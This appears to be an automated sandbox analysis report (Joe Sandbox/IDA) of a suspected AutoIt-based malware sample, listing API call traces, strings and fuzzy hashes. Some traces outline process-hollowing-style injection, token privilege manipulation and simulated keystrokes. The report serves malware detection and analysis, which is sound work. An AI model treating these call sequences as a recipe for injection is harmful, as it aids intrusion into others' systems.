                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: 45ca90016b4ce25f409079b6dd34be3fe59317ecc54e6e2f3b4d22c9903bf903
                                                                      • Instruction ID: 1ee8e6ef9339d48caede660fc5b685308583c15109273ba408d74782d6a97ac0
                                                                      • Opcode Fuzzy Hash: 45ca90016b4ce25f409079b6dd34be3fe59317ecc54e6e2f3b4d22c9903bf903
                                                                      • Instruction Fuzzy Hash: E6F0813190031BA6CB18BA94EE07FDF77AC9F01361F10442EF909A6141DF749A82A6D1
                                                                      APIs
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • __lock_file.LIBCMT ref: 00FC53EB
                                                                        • Part of subcall function 00FC6C11: __lock.LIBCMT ref: 00FC6C34
                                                                      • __fclose_nolock.LIBCMT ref: 00FC53F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                      • Instruction ID: 22bb090e561329186ffd7c8843d4cea43d945cecfb77899872be019aae3ff94c
                                                                      • Opcode Fuzzy Hash: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                      • Instruction Fuzzy Hash: 09F09C319106469AD714AB655E03FAD76A16F41775F20410CA454AB1C1CBFC5982BB51
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015B0233
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015B02C9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015B02EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction ID: 40bccd6fc358a3d91908227ed18a70f938e97d6a03a930c22c32be4e37a6169d
                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                      • Instruction Fuzzy Hash: AF12DD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E81CF5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 6abd7baa3376518c1bb51c8f218db881ab1e5133df9dde0999446d1fca7097f1
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 5731B771A00106DBC718DF58C685B69F7A6FB59310B6487A9E80ACB355DB31EDC2EBC0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 72013cb3ddbe6994f613c9364404112600b037732a5595c76eea08d8f48bc073
                                                                      • Instruction ID: 659c5336e7dcaee65d5321fd990584017940599193f5d0807dae4227c3f45fd3
                                                                      • Opcode Fuzzy Hash: 72013cb3ddbe6994f613c9364404112600b037732a5595c76eea08d8f48bc073
                                                                      • Instruction Fuzzy Hash: FE4108B4904341DFDB24DF14C454B1ABBE1BF45314F0988ACE8998B762C775E849DF52
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 1d223ea7b9a449821b5dbf5dd21c44dc6df82723be687205acd3f11b6d15db86
                                                                      • Instruction ID: be453b34dabd13ca210dc4efc35f9e58fd8f696f55e65e4177bf7977e953f207
                                                                      • Opcode Fuzzy Hash: 1d223ea7b9a449821b5dbf5dd21c44dc6df82723be687205acd3f11b6d15db86
                                                                      • Instruction Fuzzy Hash: A12166B2A14709EBCF206F11EC41BAA7BB5FB54390F25842EE486C9284EF319090F715
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f53d4a70f2b8421be27386de0361a86eaf0d547d50f74c03dd7a4a7d5bc5f49c
                                                                      • Instruction ID: 586cbb32e3fef4049e6f3b3a3b1b79a3b12249cc48cc75963bad6cebb1896b89
                                                                      • Opcode Fuzzy Hash: f53d4a70f2b8421be27386de0361a86eaf0d547d50f74c03dd7a4a7d5bc5f49c
                                                                      • Instruction Fuzzy Hash: 2121F376409202EFC311AF24D843AF6B7F4EF82322B11819EED918B862CB3059478F91
                                                                      APIs
                                                                        • Part of subcall function 00FA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4BEF
                                                                        • Part of subcall function 00FC525B: __wfsopen.LIBCMT ref: 00FC5266
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                        • Part of subcall function 00FA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FA4BA4
                                                                        • Part of subcall function 00FA4C70: _memmove.LIBCMT ref: 00FA4CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                      • Instruction ID: 9f5523c4d58701c9caa53ba3f268e6c49828d5d33bdf65c552e1e6333b5bb635
                                                                      • Opcode Fuzzy Hash: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                      • Instruction Fuzzy Hash: 9A11E772600206ABCF11FF70CC52FAD77A5AFC5750F10842DF541A7181DAFAA901B760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 00FC48A6
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0102CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CC00
                                                                      • SendMessageW.USER32 ref: 0102CC29
                                                                      • _wcsncpy.LIBCMT ref: 0102CC95
                                                                      • GetKeyState.USER32(00000011), ref: 0102CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 0102CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 0102CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CD0C
                                                                      • SendMessageW.USER32 ref: 0102CD33
                                                                      • SendMessageW.USER32(?,00001030,?,0102B348), ref: 0102CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0102CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0102CE60
                                                                      • SetCapture.USER32(?), ref: 0102CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 0102CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0102CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0102CEF5
                                                                      • ReleaseCapture.USER32 ref: 0102CF00
                                                                      • GetCursorPos.USER32(?), ref: 0102CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 0102CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102CFA3
                                                                      • SendMessageW.USER32 ref: 0102CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D00E
                                                                      • SendMessageW.USER32 ref: 0102D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0102D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0102D06D
                                                                      • GetCursorPos.USER32(?), ref: 0102D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 0102D09A
                                                                      • GetParent.USER32(?), ref: 0102D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102D123
                                                                      • SendMessageW.USER32 ref: 0102D154
                                                                      • ClientToScreen.USER32(?,?), ref: 0102D1B2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0102D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D20C
                                                                      • SendMessageW.USER32 ref: 0102D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 0102D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0102D2B5
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3977979337-4164748364
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memset
                                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                      • API String ID: 1357608183-1798697756
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00FA48DF
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FDD665
                                                                      • IsIconic.USER32(?), ref: 00FDD66E
                                                                      • ShowWindow.USER32(?,00000009), ref: 00FDD67B
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD685
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FDD69B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FDD6A2
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDD6AE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6BF
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6C7
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FDD6CF
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD6D2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6E7
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD6F2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6FC
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD701
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD70A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD70F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD719
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FDD71E
                                                                      • SetForegroundWindow.USER32(?), ref: 00FDD721
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00FDD748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      APIs
                                                                        • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                        • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                        • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                      • _memset.LIBCMT ref: 00FF8353
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FF83A5
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF83B6
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FF83CD
                                                                      • GetProcessWindowStation.USER32 ref: 00FF83E6
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00FF83F0
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FF840A
                                                                        • Part of subcall function 00FF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                        • Part of subcall function 00FF81CB: CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 2063423040-1027155976
                                                                      • Opcode ID: 4e362bfc180a485427053e4d35783ce20d49df79acb3068735486edbbac2cbc0
                                                                      • Instruction ID: 343d42f2dfeac4226da4466b4da05c3b8b292da78cc2ee490f5d08e77a6c599f
                                                                      • Opcode Fuzzy Hash: 4e362bfc180a485427053e4d35783ce20d49df79acb3068735486edbbac2cbc0
                                                                      • Instruction Fuzzy Hash: 48814B7190020DAFDF219FA4DC45AFE7B79FF083A4F284159FA50A6161DB358E16EB20
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0100C78D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100C7E1
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C806
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C81D
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0100C844
                                                                      • __swprintf.LIBCMT ref: 0100C890
                                                                      • __swprintf.LIBCMT ref: 0100C8D3
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • __swprintf.LIBCMT ref: 0100C927
                                                                        • Part of subcall function 00FC3698: __woutput_l.LIBCMT ref: 00FC36F1
                                                                      • __swprintf.LIBCMT ref: 0100C975
                                                                        • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC3713
                                                                        • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC372B
                                                                      • __swprintf.LIBCMT ref: 0100C9C4
                                                                      • __swprintf.LIBCMT ref: 0100CA13
                                                                      • __swprintf.LIBCMT ref: 0100CA62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 3953360268-2428617273
                                                                      • Opcode ID: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                      • Instruction ID: 931bfea6bd61ae1e48b98c006d44b33fcf81b961295475ec45ac8ecb3667b870
                                                                      • Opcode Fuzzy Hash: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                      • Instruction Fuzzy Hash: 97A14DB1408305ABD710EFA4CD86DAFB7ECFF86704F40492DF58586191EA78DA08DB62
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100EFB6
                                                                      • _wcscmp.LIBCMT ref: 0100EFCB
                                                                      • _wcscmp.LIBCMT ref: 0100EFE2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0100EFF4
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0100F00E
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0100F026
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F031
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F04D
                                                                      • _wcscmp.LIBCMT ref: 0100F074
                                                                      • _wcscmp.LIBCMT ref: 0100F08B
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F09D
                                                                      • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F0BB
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F0C5
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F0D2
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F0E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1803514871-438819550
                                                                      • Opcode ID: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
                                                                      • Instruction ID: a7903ec25ce68b7e746fee253bc0f6d454868357a3f9fa740d5e6f6907ebbca9
                                                                      • Opcode Fuzzy Hash: b80ebc849bd7e6774230a8eb3d589e79df4de328f4a02226f963f1b47548498e
